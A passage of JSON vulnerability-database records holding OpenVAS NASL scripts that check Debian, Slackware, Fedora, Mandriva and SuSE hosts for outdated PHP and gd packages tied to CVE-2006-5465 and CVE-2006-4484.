ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-imap\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-ldap\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mcal\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mhash\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mysql\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-odbc\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-recode\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-snmp\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-sybase\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-xslt\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:50", "references": [], "pluginID": "57699", "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-307-01.", "edition": 2, "reporter": "Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com", "published": "2012-09-11T00:00:00", "title": "Slackware Advisory SSA:2006-307-01 php", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Slackware Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-5465"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57699", "id": "OPENVAS:57699", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_307_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New php packages are available for Slackware 10.2 and 11.0 to\nfix security issues.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2006-307-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-307-01\";\n \nif(description)\n{\n script_id(57699);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2006-5465\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2006-307-01 php \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"php\", ver:\"4.4.4-i486-2_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"php\", ver:\"5.2.0-i486-1\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:54", "references": ["2008-1643", "https://www.redhat.com/archives/fedora-package-announce/2008-February/msg00502.html"], "pluginID": "860643", "description": "Check for the Version of graphviz", "edition": 2, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-02-16T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for graphviz FEDORA-2008-1643", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4484"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=860643", "id": "OPENVAS:860643", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for graphviz FEDORA-2008-1643\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"graphviz on Fedora 7\";\ntag_insight = \"A collection of tools for the manipulation and layout\n of graphs (as in nodes and edges, not as in barcharts).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-February/msg00502.html\");\n script_id(860643);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-16 14:16:57 +0100 (Mon, 16 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2008-1643\");\n script_cve_id(\"CVE-2006-4484\");\n script_name( \"Fedora Update for graphviz FEDORA-2008-1643\");\n\n script_summary(\"Check for the Version of graphviz\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC7\")\n{\n\n if ((res = isrpmvuln(pkg:\"graphviz\", rpm:\"graphviz~2.12~10.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:38:28", "references": ["http://lists.mandriva.com/security-announce/2008-02/msg00011.php", "2008:038"], "pluginID": "1361412562310830491", "description": "Check for the Version of gd", "edition": 2, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-04-09T00:00:00", "type": "openvas", "title": "Mandriva Update for gd MDVSA-2008:038 (gd)", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Mandrake Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4484"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830491", "id": "OPENVAS:1361412562310830491", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for gd MDVSA-2008:038 (gd)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Buffer overflow in the LWZReadByte() function in gd_gif_in.c in GD\n prior to 2.0.34 allows remote attackers to have an unknown impact\n via a GIF file with input_code_size greater than MAX_LWZ_BITS, which\n triggers an overflow when initializing the table array.\n\n This was originally fixed in PHP's embedded GD with MDKSA-2006:162;\n patches had not been applied to the system libgd at that time.\n \n The updated packages have been patched to correct this issue.\";\n\ntag_affected = \"gd on Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-02/msg00011.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830491\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:26:37 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDVSA\", value: \"2008:038\");\n script_cve_id(\"CVE-2006-4484\");\n script_name( \"Mandriva Update for gd MDVSA-2008:038 (gd)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of gd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"gd-utils\", rpm:\"gd-utils~2.0.33~5.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgd2\", rpm:\"libgd2~2.0.33~5.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgd2-devel\", rpm:\"libgd2-devel~2.0.33~5.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgd2-static-devel\", rpm:\"libgd2-static-devel~2.0.33~5.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gd\", rpm:\"gd~2.0.33~5.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64gd2\", rpm:\"lib64gd2~2.0.33~5.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64gd2-devel\", rpm:\"lib64gd2-devel~2.0.33~5.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64gd2-static-devel\", rpm:\"lib64gd2-static-devel~2.0.33~5.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:55:47", "references": [], "pluginID": "65329", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n php4-imap\n php4-gd\n php4-mysql\n php4-session\n php4-pgsql\n php4-fastcgi\n php4-mbstring\n php4-recode\n php4\n apache2-mod_php4\n php4-curl\n php4-sysvshm\n mod_php4-servlet\n mod_php4-core\n php4-wddx\n php4-exif\n php4-pear\n php4-servlet\n php4-devel\n apache-mod_php4\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5009430 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "edition": 2, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-10-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "SLES9: Security update for PHP4", "type": "openvas", "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-5465"], "modified": "2017-07-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=65329", "id": "OPENVAS:65329", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5009430.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for PHP4\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n php4-imap\n php4-gd\n php4-mysql\n php4-session\n php4-pgsql\n php4-fastcgi\n php4-mbstring\n php4-recode\n php4\n apache2-mod_php4\n php4-curl\n php4-sysvshm\n mod_php4-servlet\n mod_php4-core\n php4-wddx\n php4-exif\n php4-pear\n php4-servlet\n php4-devel\n apache-mod_php4\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5009430 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65329);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-5465\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for PHP4\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php4-imap\", rpm:\"php4-imap~4.3.4~43.72\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:00:55", "references": [], "pluginID": "136141256231057699", "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-307-01.", "edition": 3, "reporter": "Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com", "published": "2012-09-11T00:00:00", "title": "Slackware Advisory SSA:2006-307-01 php", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Slackware Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-5465"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231057699", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231057699", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_307_01.nasl 9352 2018-04-06 07:13:02Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New php packages are available for Slackware 10.2 and 11.0 to\nfix security issues.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2006-307-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-307-01\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.57699\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:13:02 +0200 (Fri, 06 Apr 2018) $\");\n script_cve_id(\"CVE-2006-5465\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 9352 $\");\n name = \"Slackware Advisory SSA:2006-307-01 php \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"php\", ver:\"4.4.4-i486-2_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"php\", ver:\"5.2.0-i486-1\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:38:58", "references": [], "pluginID": "136141256231065329", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n php4-imap\n php4-gd\n php4-mysql\n php4-session\n php4-pgsql\n php4-fastcgi\n php4-mbstring\n php4-recode\n php4\n apache2-mod_php4\n php4-curl\n php4-sysvshm\n mod_php4-servlet\n mod_php4-core\n php4-wddx\n php4-exif\n php4-pear\n php4-servlet\n php4-devel\n apache-mod_php4\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5009430 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-10-10T00:00:00", "title": "SLES9: Security update for PHP4", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-5465"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065329", "id": "OPENVAS:136141256231065329", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5009430.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for PHP4\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n php4-imap\n php4-gd\n php4-mysql\n php4-session\n php4-pgsql\n php4-fastcgi\n php4-mbstring\n php4-recode\n php4\n apache2-mod_php4\n php4-curl\n php4-sysvshm\n mod_php4-servlet\n mod_php4-core\n php4-wddx\n php4-exif\n php4-pear\n php4-servlet\n php4-devel\n apache-mod_php4\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5009430 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65329\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-5465\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for PHP4\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php4-imap\", rpm:\"php4-imap~4.3.4~43.72\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:38:41", "references": [], "pluginID": "136141256231065420", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n perl-Tk\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5021923 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-10-10T00:00:00", "title": "SLES9: Security update for perl-Tk", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4484"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065420", "id": "OPENVAS:136141256231065420", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5021923.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for perl-Tk\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n perl-Tk\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5021923 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65420\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-4484\");\n 